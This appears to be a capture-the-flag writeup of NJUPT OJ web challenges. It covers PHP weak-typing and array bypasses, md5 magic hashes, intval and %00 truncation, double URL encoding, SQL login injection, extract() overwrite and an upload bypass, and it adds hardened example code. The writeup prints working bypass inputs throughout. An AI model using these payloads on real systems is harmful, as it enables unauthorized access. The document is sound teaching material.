[NJUPT OJ] Web

Sign-in 2

Address: Source: Network Attack and Defense Competition

  • It says to enter zhimakaimen. I didn't look carefully at first: only 10 characters could be typed, but zhimakaimen is eleven characters. I only noticed after inspecting the element.


  • Just change maxlength.
  • flag is: nctf{follow_me_to_exploit}

This one isn't Web

Really, trust me! This one isn't Web.
Portal: challenge link.

  • It's an animated gif. Download it, open it in 010 Editor, and scroll to the end.


  • nctf{photo_can_also_hid3_msg}

Layer by layer

A challenge by hacker uncle p0tt1.
Everyone go follow his Weibo~
Challenge portal: challenge link

  • It's a web page. No idea, so view the source.
<pre id="line1"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html xmlns="http://www.w3.org/1999/xhtml">  <head>  <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  <title>SuperSo | by:p0tt1</title>  <meta name="keywords" content="SuperSo | by:p0tt1">  <meta name="Description" content="SuperSo | by:p0tt1" />  <!-- css,js -->  <style type="text/css"> *{margin:0;padding:0;}
body{background:#FFFFFF;font-size:12px;font-family:"微软雅黑";#666}

.course{width:1024px;height:680px;margin:30px auto;}
.course .course_box{width:255px;height:155px;background:#FFCC66;float:left;margin-left:1px;
    cursor:pointer;margin-bottom:20px;color:#fff;position:relative;
}
.course .course_box h3{font-size:24px;font-weight:300;text-align:center;margin-top:63px;}
.course .course_box p{width:255px;height:155px;position:absolute;left:0;top:0;padding:10px;background:#000;opacity:0.5;
                        filter:alpha(opacity=50);display:none;  
}
.course .course_box p span{display:block;margin-top:2px;padding:2px;}
.course .course_box p .course_title{font-size:22px;}
.course .tz_blue{background:#2d8af1;}
.course .tz_red{background:#D44825;}
.course .tz_gray{background:#666;}
.course .tz_org{background:#ff6e1a;}
.course .tz_lv{background:#0cc5e7;}
.course .tz_qing{background:#64d500;}
.course .tz_yellow{background:#d5c300;} 
.course .tz_blue{background:#2d8af1;}
.course .tz_bluees{background:#2a45f1;}
.course .tz_redd{background:#D44835;}
.course .tz_grayy{background:black;}
.course .tz_orgg{background:#ff6e4a;}
.course .tz_lvv{background:#0cc5a7;}
.course .tz_qingg{background:#64c500;}
.course .tz_yelloww{background:#d45300;}
.course .tz_bluee{background:#2ddff1;} 
</style>  
<link href="[css/animate.min.css](view-source:http://chinalover.sinaapp.com/web3/css/animate.min.css)" rel="stylesheet" type="text/css">
</link>  
</head>  
<body>  
<body style="overflow:auto;">  
<iframe runat="server" src="[SO.html](view-source:http://chinalover.sinaapp.com/web3/SO.html)" width="100%" height="237" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>  
<iframe runat="server" src="[http://www.lunzhiyu.com](view-source:http://www.lunzhiyu.com/)" width="100%" height="3800" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe> 
</body>  
</html>
</pre>
  • The iframe in the code stands out, and its attribute values are odd too: everything is 0 or no. Given the title "layer by layer", the information is probably hidden in the iframes' src. Following each src shows that only the first one, SO.html, has content; the second iframe, http://www.lunzhiyu.com, has nothing, so keep drilling into the first iframe.
  • After clicking through several times, we get:
<pre id="line1"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">  <HTML><HEAD><TITLE>有人偷偷先做题,哈哈飞了吧?</TITLE>  <META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">  <STYLE type="text/css"> BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon } </STYLE>  </HEAD><BODY>  <center>  <TABLE width=500 border=0 cellspacing=10><TR><TD>  <!-- Placed at the end of the document so the pages load faster -->  <!--  
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->  
<p>来来来,听我讲个故事:</p>  
<ul>  
<li>从前,我是一个好女孩,我喜欢上了一个男孩小A。</li>  
<li>有一天,我终于决定要和他表白了!话到嘴边,鼓起勇气... </li>  
<li>可是我却又害怕的<a href="javascript:history.back(1)">后退</a>了。。。</li>  
</ul>  <h2>为什么?
<br>为什么我这么懦弱?</h2>  
<hr>  
<p>最后,他居然向我表白了,好开森...说只要骗足够多的笨蛋来这里听这个蠢故事浪费时间,</p>  
<p>他就同意和我交往!</p>  
<p>谢谢你给出的一份支持!哇哈哈\(^o^)/~!</p>  
</TD></TR></TABLE>  
</center>  
</BODY></HTML></pre>
  • Look closely at the js code; it's hidden pretty deep.


  • nctf{this_is_a_fl4g}
  • Postscript:
    Capturing the traffic, or watching the Network tab in the inspector, shows 404.html; open it and view its source.



Single for twenty years

This one can be solved with skill or with fast hands!
I've been single for twenty years, so naturally it's fast hands!
Challenge address: go get it!

  • Clicking in, the page redirects and shows:
    There really is no KEY here, Brother Tutu said so, and Brother Tutu never tricks anyone. PS: Tutu is Runtu, not Tan-shen.
  • View the homepage source: view-source:http://chinalover.sinaapp.com/web8/
<pre id="line1"><html>  
<head>  
<meta http-equiv="content-type" content="text/html;charset=utf-8">  
</head>  
<body>  
<a href="[./search_key.php](view-source:http://chinalover.sinaapp.com/web8/search_key.php)">_到这里找key__</a>  
</body>  
</html>
</pre>
  • Click into ./search_key.php
<script>window.location="./no_key_is_here_forever.php"; </script>
key is : nctf{yougotit_script_now}
  • nctf{yougotit_script_now}
___

Comprehensive challenge

Challenge address: tip: bash

  • Opening it reveals JSFuck code.
    Whoa! What on earth is this?
  • Run it in the console and the page shows a php file name. The name is an md5 hash; reversing it gives md5.php.
1bc29b36f623ba82aaf6724fd3b16718.php
zip -r flagbak.zip ./*
  • Open flagbak.zip
    It downloads directly and contains a flag.txt file
flag is:nctf{bash_history_means_what}
  • flag is:nctf{bash_history_means_what}

pass check

Core source

<?php
$pass=@$_POST['pass'];
$pass1=***********;//the hidden password
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

Portal: challenge link

  • The page has just one line:
    please input pass!
  • Analysis:
    1. From the source, the POSTed pass must equal pass1.
    2. In PHP, @ suppresses the errors and warnings a function raises while running, so users never see the error output.
    3. The strcmp() function

    4. It returns 0 when the two strings are equal, which is why there is an exclamation mark in front of strcmp().
    5. Exploit PHP's weak typing.
  • POST an array so that strcmp() returns null; then "!null" is true and echo "flag:nctf{*}" runs.
    1. At first I built it as pass=[], which didn't work.

    2. It should be built as pass[]=123


  • flag:nctf{strcmp_is_n0t_3afe}
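As an added example (not the challenge's own code), the strcmp() check from the source above beside a hardened form; the secret value is a placeholder:

```php
<?php
// Added example, not code from the original challenge: the writeup's
// strcmp() check beside a hardened version. $secret stands in for the
// hidden $pass1 and is a placeholder.
//
// On PHP 5 and 7, strcmp() given an array emits a warning and returns NULL;
// the @ hides the warning and !NULL is true, so the check passes without the
// password. PHP 8 throws a TypeError instead, which @ does not suppress, so
// the bypass is version-dependent but the pattern is wrong on every version.

function check_legacy($pass, string $pass1): bool
{
    // Exactly the challenge's condition.
    return @!strcmp($pass, $pass1);
}

function check_hardened($pass, string $pass1): bool
{
    // pass[]=123 arrives as an array; refuse anything that is not a string
    // before it reaches a string function.
    if (!is_string($pass)) {
        return false;
    }
    // hash_equals() compares two strings strictly and in constant time.
    return hash_equals($pass1, $pass);
}

$secret = 'placeholder-secret';

// Constructed request bodies and what $_POST['pass'] holds for each.
$requests = [
    'pass=wrong'      => 'wrong',
    'pass[]=123'      => ['123'],   // PHP parses pass[] into an array
    'pass=' . $secret => $secret,
];

foreach ($requests as $body => $pass) {
    try {
        $legacy = check_legacy($pass, $secret) ? 'flag' : 'wrong';
    } catch (TypeError $e) {
        $legacy = 'TypeError';       // PHP 8 rejects the array outright
    }
    $hardened = check_hardened($pass, $secret) ? 'flag' : 'wrong';
    printf("%-28s legacy=%-9s hardened=%s\n", $body, $legacy, $hardened);
}
```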

Header

Header!! Header!!!
Portal: click me

  • Just look at the header


  • nctf{tips_often_hide_here}

File inclusion

That's right, this is the legendary LFI.
Portal: click me and fly
TIPS: http://drops.wooyun.org/tips/3827

  • Skipping this one; it's the same as Bugku's "flag is in index", see [Bugku writeup] Web
  • nctf{edulcni_elif_lacol_si_siht}

Even a hundred years single won't help

Yes... for this one, even a hundred years single won't help.
Portal: biu~

  • Same old routine: watch the Network tab and click in to see what changes


  • The earlier 304 status of index.php turns into a 302; the flag is in the response header
  • nctf{this_is_302_redirect}

Download~!

Download whatever you like, just not the music. No kidding, try downloading something else.
True·Ultimate·Portal: click me

  • View the source
<pre id="line1">  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>Game 19</title>  
<link href="[templatemo_style.css](view-source:http://way.nuptzj.cn/web6/templatemo_style.css)" rel="stylesheet" type="text/css" />  
</head>  <body>  
<div id="templatemo_container">  <div id="templatemo_header">  <div id="website_title">  </div>  </div>  <div id="templatemo_menu">  
<ul>  <li><a href="[#](view-source:http://way.nuptzj.cn/web6/#)" class="current">Tips</a></li>  <li><b>down</b></li>  
</ul>  </div>  
<div id="templatemo_content_wrapper">  <div id="templatemo_content">  <div class="content_title_01">听会歌吧</div>  <div class="horizontal_divider_01">&nbsp;</div>  <div class="cleaner">&nbsp;
</div>  
<p>为了让大家更轻松的比赛,为大家准备了两首歌让大家下载</p>  
<p><a href="[download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=](view-source:http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=)" target="_blank">星星点灯</a>
</p>  <p>
<a href="[download.php?url=YnV4aWFuZ3poYW5nZGEubXAz](view-source:http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz)" target="_blank">不想长大</a>
</p>  
<div class="cleaner">&nbsp;
</div>  
</div>  
<div class="cleaner">&nbsp;</div>  
</div>  <div id="templatemo_footer">  
</div>  </div>  </body>  </html></pre>
  • Click "download.php?url=YnV4aWFuZ3poYW5nZGEubXAz": the file name is base64-encoded. Try downloading other files; usually what you want is the current page's source, so base64-encode download.php and build:
    view-source:http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw, which shows the source without having to download it
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
    $file_size = filesize($url);
    header ( "Pragma: public" );
    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
    header ( "Cache-Control: private", false );
    header ( "Content-Transfer-Encoding: binary" );
    header ( "Content-Type:audio/mpeg MP3");
    header ( "Content-Length: " . $file_size);
    header ( "Content-Disposition: attachment; filename=".$url);
    echo(file_get_contents($url));
    exit;
}
else {
    echo "Access Forbidden!";
}
?>
<?php
//flag:nctf{download_any_file_666}
?>
  • nctf{download_any_file_666}
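The flaw in download.php is that its allowlist names the script's own source (download.php) and the file holding the key. As an added example (not the challenge's code), here is how a download handler can validate a base64-encoded file name so that only media in one directory can ever be served. The media directory name is an assumption; the base64 values are the ones from the page.

```python
import base64
from pathlib import PurePosixPath
from typing import Optional

# Constructed layout: the directory holding the two songs (assumed name).
MEDIA_DIR = PurePosixPath("/var/www/web6/media")
ALLOWED_SUFFIXES = {".mp3"}


def decode_url_param(url_param: str) -> Optional[str]:
    """Decode the base64 `url` parameter the way download.php does.

    base64 is an encoding, not encryption: anyone can produce the value for
    any file name, so the decoded name still has to be validated.
    """
    try:
        return base64.b64decode(url_param, validate=True).decode("utf-8")
    except ValueError:          # bad base64 alphabet/padding or non-UTF-8 bytes
        return None


def resolve_download(url_param: str) -> Optional[PurePosixPath]:
    """Return the path that may be served, or None when the request is refused.

    Changes relative to the challenge's download.php:
      * the allowlist is a directory plus a suffix set, so source files such
        as download.php or hereiskey.php can never qualify;
      * the decoded value must be a bare file name, which rules out "../"
        and absolute paths;
      * empty names and names containing a NUL byte are refused.
    """
    name = decode_url_param(url_param)
    if not name or "\x00" in name or name in (".", ".."):
        return None
    path = PurePosixPath(name)
    if path.name != name:            # had a directory component
        return None
    if path.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    return MEDIA_DIR / name


def url_param_for(name: str) -> str:
    """Build the `url` value for a file name (what the page's links contain)."""
    return base64.b64encode(name.encode("utf-8")).decode("ascii")
```

With this shape the "allowlist" is a property of the directory (what is in it and what suffix it has) rather than a list of strings in the script, so adding the script itself to the list by mistake is not possible.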

COOKIE

COOKIE just means a sweet biscuit~
Address: portal

TIP:
0==not

  • Use Tamper Data to change the cookie's login to 1 and that is it

  • It displays:
    flag:nctf{cookie_is_different_from_session}

  • nctf{cookie_is_different_from_session}


MYSQL

Not every problem can be this easy,
right?
Problem address

Don't get too excited, the flag isn't here. Did you read what this file is for?
In CTF competitions this file often holds hint information

TIP:sql.php

<?php
if($_GET[id]) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $id = intval($_GET[id]);
  $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
  if ($_GET[id]==1024) {
    echo "<p>no! try again</p>";
  }
  else{
    echo($query[content]);
  }
}
?>
  • Pass an id parameter to sql.php. At first I had not worked out what id=1024 meant and even tried brute-forcing id; thinking about it, id=1024 is in fact the row holding the flag.
    1. $id must end up as 1024
    2. but the passed-in $_GET[id] must not equal 1024
    3. construct it with the intval() truncation function
  • Set $_GET[id]=1024.1:
    http://chinalover.sinaapp.com/web11/sql.php?id=1024.1
the flag is:nctf{query_in_mysql}
  • nctf{query_in_mysql}

md5 collision

Source

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
?>

Portal: problem address

  • Opening it shows one line
please input a
  • So a parameter has to be passed in
    1. a != QNKCDZO
    2. md5(a) == md5('QNKCDZO')
  • No idea at first; let's see what md5('QNKCDZO') looks like:
    0e830400451993494058024219903391
  • It starts with 0e. Exploit the behaviour of "==": the values are type-converted during the comparison, and 0eXXXXXXXXXX becomes 0.
  • Combine that with other strings whose MD5 also starts with 0e (duplicates removed):
    String          MD5
    s878926199a     0e545993274517709034328855841020
    s155964671a     0e342768416822451524974117254469
    s214587387a     0e848240448830537924465865611904
    s1091221200a    0e940624217856561557816327384675
    s1885207154a    0e509367213418206700842008763514
    s1502113478a    0e861580163291561247404381396064
    s1836677006a    0e481036490867661113260034900752
    s1184209335a    0e072485820392773389523109082030
    s1665632922a    0e731198061491163073197128363787
    s532378020a     0e220463095855511507588041205815
    Passing any one of these strings as a returns:
nctf{md5_collision_is_easy}
  • Check carefully whether it is GET or POST; at first I kept POSTing and nothing ever came out.
  • nctf{md5_collision_is_easy}
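The md5 trick above and the intval() trick in the MYSQL problem both rest on one PHP rule: strings that look like numbers are compared as numbers by ==. The following is an added example, not from the original post, that emulates that rule in Python and checks the magic-hash list against hashlib; php_loose_equals and php_intval are approximations of PHP 5/7 behaviour for str/int/float operands only (non-numeric strings fall back to plain string comparison). The hardened check is the counterpart of PHP's === / hash_equals(): compare the digests as strings, in constant time. The same rule is why a ten-character token of all zeros compares equal to '0'.

```python
import hashlib
import hmac
import re

# PHP < 8 treats a string as numeric when it is a decimal number with an
# optional fraction and exponent; "0e123" is numeric and evaluates to 0.0.
_NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def _as_number(value):
    """Return the float PHP would compare with, or None if not numeric."""
    if isinstance(value, bool):
        return None
    if isinstance(value, (int, float)):
        return float(value)
    if isinstance(value, str) and _NUMERIC_RE.match(value):
        return float(value)
    return None


def php_loose_equals(a, b) -> bool:
    """Emulate the PHP 5/7 `==` cases this page depends on (assumption: only
    str, int and float operands; non-numeric strings compare as strings).

    Two numeric strings compare as numbers, so every md5 of the form
    "0e<digits>" is == to every other one: both are 0 * 10^n.
    """
    na, nb = _as_number(a), _as_number(b)
    if na is not None and nb is not None:
        return na == nb
    return str(a) == str(b)


def php_intval(value: str) -> int:
    """Emulate intval() on a string: leading integer digits, else 0."""
    m = re.match(r"^\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


# Strings whose md5 begins with "0e" followed only by digits, and the digest
# listed for each (the list from the writeup, duplicates dropped).
MAGIC_MD5 = {
    "QNKCDZO": "0e830400451993494058024219903391",
    "s878926199a": "0e545993274517709034328855841020",
    "s155964671a": "0e342768416822451524974117254469",
    "s214587387a": "0e848240448830537924465865611904",
    "s1091221200a": "0e940624217856561557816327384675",
    "s1885207154a": "0e509367213418206700842008763514",
    "s1502113478a": "0e861580163291561247404381396064",
    "s1836677006a": "0e481036490867661113260034900752",
    "s1184209335a": "0e072485820392773389523109082030",
    "s1665632922a": "0e731198061491163073197128363787",
    "s532378020a": "0e220463095855511507588041205815",
}


def is_zero_e_hash(h: str) -> bool:
    """A digest that PHP's `==` would read as the number zero."""
    return re.fullmatch(r"0e\d+", h) is not None


def vulnerable_check(a: str) -> bool:
    """The challenge's test: `$a != 'QNKCDZO' && md5('QNKCDZO') == md5($a)`."""
    return a != "QNKCDZO" and php_loose_equals(md5_hex("QNKCDZO"), md5_hex(a))


def hardened_check(a: str) -> bool:
    """Compare digests as strings in constant time (PHP: hash_equals())."""
    return a != "QNKCDZO" and hmac.compare_digest(md5_hex("QNKCDZO"), md5_hex(a))
```

Run through the emulator, "1024.1" == 1024 is false while php_intval("1024.1") is 1024, which is exactly the gap the MYSQL problem exploits: the code validates one value and queries with another. Validate and use the same normalised value.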

bypass again

Address: still weak typing

Source: hctf

if (isset($_GET['a']) and isset($_GET['b'])) {
    if ($_GET['a'] != $_GET['b'])
        if (md5($_GET['a']) == md5($_GET['b']))
            die('Flag: '.$flag);
        else
            print 'Wrong.';
}
  • Requirements:
    1. pass two parameters a and b
    2. a != b
    3. md5(a) == md5(b)

  • Exploit the loose parameter handling of built-in functions: pass the function an argument type it cannot accept.

  • Pass two arrays so that md5() returns null, and null==null:
    http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2

Flag: nctf{php_is_so_cool}
  • Once again I had not checked whether it was GET or POST and went on POSTing; I despair of myself
  • nctf{php_is_so_cool}

PHP is the best language in the world

They say PHP is the best language in the world
Address: problem address

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?
  • I first fiddled with the eregi() function: case-insensitive string matching.
  • Then I noticed the source urldecodes id once more, so id has to be urlencoded twice
    1. URL encoding normally does not transform letters
    2. so first convert hackerDJ to hex and put a percent sign before every pair: %63%6b%65%72%44%4a
    3. then urlencode that: %2563%256b%2565%2572%2544%254a
    http://way.nuptzj.cn/php/index.php/?id=%2563%256b%2565%2572%2544%254a
Access granted!

flag: nctf{php_is_best_language}


Can you authenticate to this website? index.txt
  • Postscript:
    URL decoding:
    %-->%
    %25-->%
    The second urlencode really just turns % into %25, so double-encoding a single character is enough: %2563%6b%65%72%44%4a; the other % signs still decode as %
  • nctf{php_is_best_language}
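The bug is one of ordering: the blacklist runs against the raw parameter, and only afterwards is the value decoded a second time. As an added example (not the challenge's code), the vulnerable order and the hardened order side by side in Python; double_encode encodes the full string hackerDJ, and server_decode stands for the one urldecode the web server performs before the script sees the value.

```python
import re
from urllib.parse import quote, unquote

BLOCKED = "hackerDJ"


def server_decode(raw_query_value: str) -> str:
    """The single percent-decoding the web server applies to $_GET values."""
    return unquote(raw_query_value)


def vulnerable_auth(id_param: str) -> str:
    """Check the parameter as received, then decode it again (the page's order).

    The value that is checked and the value that is used differ, so a
    representation the check does not understand slips through.
    """
    if re.search(re.escape(BLOCKED), id_param, re.IGNORECASE):   # eregi()
        return "not allowed!"
    decoded = unquote(id_param)        # second urldecode, after the check
    return "Access granted!" if decoded == BLOCKED else "denied"


def hardened_auth(id_param: str) -> str:
    """Normalise first, then decide: the checked value is the used value."""
    decoded = unquote(id_param)
    if re.search(re.escape(BLOCKED), decoded, re.IGNORECASE):
        return "not allowed!"
    return "Access granted!" if decoded == BLOCKED else "denied"


def double_encode(s: str) -> str:
    """Percent-encode every byte, then encode the result again (% -> %25)."""
    once = "".join("%%%02x" % b for b in s.encode("utf-8"))
    return quote(once, safe="")
```

The general rule is to canonicalise input exactly once, at the boundary, and to run every check on that canonical form; a second decode anywhere downstream reopens the hole.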

SQL Injection 1

Heard you can do injection too?
Address: problem address

  • Click Source
<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
  echo '</br>'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
    echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
  • In PHP the dot is the string concatenation operator:
SQLstr = "select    *    from abc_table where user_name = ' " . $user_name . " ' ";
can be rewritten as
SQLstr = "select    *    from abc_table where user_name = ' $user_name ' ";
  • Nothing is filtered, so the injection only has to close the ') and make user=admin


  • nctf{ni_ye_hui_sql?}

/x00

Problem address: this problem has several solutions; how many can you come up with?

  • The page gives the source
view-source:

    if (isset ($_GET['nctf'])) {
        if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
            echo '必须输入数字才行';
        else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
            die('Flag: '.$flag);
        else
            echo '骚年,继续努力吧啊~';
    }
  • Requirements:
    1. pass an nctf parameter
    2. nctf starts with a digit, continues with digits and ends with a digit: ^[1-9]+$ --> all digits
    3. nctf==#biubiubiu is what prints the flag
  • Use 0x00 truncation against ereg()
  • Remember to urlencode:
    0x00-->%00
    #-->%23
    so nctf=123%00%23biubiubiu
  • Refresh and the flag appears
    Flag: flag:nctf{use_00_to_jieduan}
  • nctf{use_00_to_jieduan}
  • Postscript:
    with nctf[]=123 you get:
    Warning: strpos() expects parameter 1 to be string, array given in web4/f5a14f5e6e3453b78cd73899bad98d53/index.php on line 10
    Flag: flag:nctf{use_00_to_jieduan}
  • Explanation:
    --> ereg() works on strings; given an array it returns NULL
    --> NULL===FALSE (strict comparison) is FALSE
    --> strpos() works on strings; given an array it returns NULL
    --> NULL===FALSE (strict) does not hold, i.e. NULL!==FALSE, so the flag is printed
  • Reference:
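Both solutions above, and the array tricks against strcmp() and md5() earlier on the page, come from the same two facts about old PHP string functions: the C-based matcher stops at a NUL byte, and a non-string argument makes the function return NULL instead of FALSE, which a strict === FALSE test then lets through. The following is an added example, not from the original post, that emulates those two behaviours in Python and sets the hardened check beside the transcribed vulnerable one. The flag string is a constructed placeholder.

```python
import re
from typing import Union

FLAG = "nctf{constructed_placeholder}"   # constructed, not the real flag


def php_ereg_digits(value) -> Union[bool, None]:
    """Emulate @ereg("^[1-9]+$", $value) as the old PHP binding behaved.

    * The pattern was handed to a C routine that reads up to the first NUL,
      so "123\x00#biubiubiu" matched as if it were just "123".
    * A non-string (array) argument produced NULL, not FALSE.
    Returns True on match, False on no match, None for a non-string.
    """
    if not isinstance(value, str):
        return None
    head = value.split("\x00", 1)[0]
    return re.fullmatch(r"[1-9]+", head) is not None


def php_strpos(haystack, needle: str) -> Union[int, bool, None]:
    """Emulate strpos(): offset, False when absent, NULL for a non-string."""
    if not isinstance(haystack, str):
        return None
    idx = haystack.find(needle)
    return False if idx < 0 else idx


def vulnerable_check(nctf) -> str:
    """The challenge's logic with the emulated functions."""
    if php_ereg_digits(nctf) is False:              # `=== FALSE`: NULL passes
        return "must enter digits"
    if php_strpos(nctf, "#biubiubiu") is not False:  # `!== FALSE`: NULL passes
        return "Flag: " + FLAG
    return "keep trying"


def hardened_check(nctf) -> str:
    """Type-check first, refuse NUL bytes, then match the whole string.

    A string made only of the digits 1-9 can never contain "#biubiubiu",
    so with correct matching the flag branch is unreachable by design.
    """
    if not isinstance(nctf, str) or "\x00" in nctf:
        return "must enter digits"
    if re.fullmatch(r"[1-9]+", nctf) is None:
        return "must enter digits"
    return "keep trying"
```

The defensive pattern is the same for every function family shown on this page: reject unexpected types up front, and treat "the check returned something other than a definite pass" as a failure rather than testing only for one specific failure value.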




Variable Overwrite

Heard of variable overwriting?
Address: problem address

  • View source.php
<?php
include("secret.php");
?>
<html>
    <head>
        <title>The Ducks</title>
        <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
    </head>
    <body>
        <div class="container">
            <div class="jumbotron">
                <center>
                    <h1>The Ducks</h1>
                    <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
                        <?php
                        extract($_POST);
                        if ($pass == $thepassword_123) { ?>
                            <div class="alert alert-success">
                                <code><?php echo $theflag; ?></code>
                            </div>
                        <?php } ?>
                    <?php } ?>
                    <form action="." method="POST">
                        <div class="row">
                            <div class="col-md-6 col-md-offset-3">
                                <div class="row">
                                    <div class="col-md-9">
                                        <input type="password" class="form-control" name="pass" placeholder="Password" />
                                    </div>
                                    <div class="col-md-3">
                                        <input type="submit" class="btn btn-primary" value="Submit" />
                                    </div>
                                </div>
                            </div>
                        </div>
                    </form>
                </center>
            </div>
            <p>
                <center>
                    source at <a href="source.php" target="_blank">/source.php</a>
                </center>
            </p>
        </div>
    </body>
</html> 
  • Key part:
<?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
    <?php
    extract($_POST);
    if ($pass == $thepassword_123) { ?>
        <div class="alert alert-success">
            <code><?php echo $theflag; ?>
  • extract() imports variables from an array into the current symbol table.
    1. It uses the array keys as variable names and the array values as variable values; for every element of the array a corresponding variable is created in the current symbol table.
    2. Since extract()'s argument is $_POST, POST a parameter thepassword_123 to overwrite the default $thepassword_123, and make the POSTed pass equal to it.
  • nctf{bian_liang_fu_gai!}
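As an added example (not the challenge's code), the same logic in Python: the vulnerable version models extract($_POST) by merging the request into the scope that also holds the secret, the hardened version reads only the one field it expects. The secret and the flag are constructed placeholders.

```python
import hmac

SECRET_PASSWORD = "constructed-secret"    # stands in for secret.php's $thepassword_123
FLAG = "nctf{constructed_placeholder}"   # constructed, not the real flag


def vulnerable_login(post: dict) -> str:
    """Mirror of the page: extract($_POST) puts every POST key into the same
    scope as the secret, so the client can redefine thepassword_123 itself."""
    scope = {"thepassword_123": SECRET_PASSWORD, "theflag": FLAG}
    scope.update(post)                   # extract() with its default EXTR_OVERWRITE
    if scope.get("pass") == scope.get("thepassword_123"):
        return scope["theflag"]
    return "wrong password"


def hardened_login(post: dict) -> str:
    """Read only the expected field; input never chooses variable names,
    and the comparison is a constant-time byte comparison."""
    supplied = post.get("pass")
    if isinstance(supplied, str) and hmac.compare_digest(
        supplied.encode("utf-8"), SECRET_PASSWORD.encode("utf-8")
    ):
        return FLAG
    return "wrong password"
```

If extract() cannot be avoided, EXTR_SKIP (never overwrite an existing variable) or a prefix flag limits the damage, but reading named fields from $_POST is the simpler fix.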

Upload Bypass

Problem address: guess how the code is written

  • A file-upload type bypass. Open Burp Suite and try uploading a file:

1. filename=1.png
2. uppath=/uploads/1.png
  • Try uploading a php

1. filename=download.php
2. uppath=/uploads/download.php
  • Analysis:
